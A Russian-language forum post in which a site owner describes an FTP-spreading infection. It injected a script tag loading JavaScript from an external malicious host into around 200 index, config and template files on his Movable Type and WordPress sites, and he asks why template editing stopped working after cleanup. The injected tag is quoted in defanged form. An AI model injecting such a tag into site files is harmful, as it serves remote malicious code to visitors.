Тема: Не могу редактировать шаблоны
Здравствуйте! Прошу вашей помощи.
9 августа, меня осчастливили вирусом. Google подсказал мне, что я не один такой. С такой же проблемой столкнулись Два миллионера. Вот описание проблемы на их блоге.
Сначала, вирус попадает на ваш, пардон, на мой комп. NOD32, даже не пискнул! Потом, при входе на ftp, он распространяется по всем сайтам. У меня пострадали все сайты на Movable Type и на Wordpress. Автоматически добавляется в каждый файл с названиями: index.php, index.html, config.php, registration.php, template.htm, wp-config.php, wp-admin.php такая строка:
<скрипт src=”aштитипи://byhosted.ком/ajaxengine.жс”></скрипт>
У меня, было заражено около 200 файлов. После чистки, все заработало, но на Movable Type, начались проблемы. Я не могу ни создать, ни отредактировать ни один шаблон. Поле для редактирования затемнено серым цветом. Могу только создавать, редактировать статьи и управлять комментариями.
Может я удалил что-то лишнее или не удалил еще что то? Есть бэкап всех файлов, созданный за две недели до этого случая. Количество пользователей не изменилось, администратор тот же. Буду благодарен любому совету.
P.S. А нашла вирус утилита Dr.Web CureIt!
Отредактировано Денис (18:10:2011 01:24:15)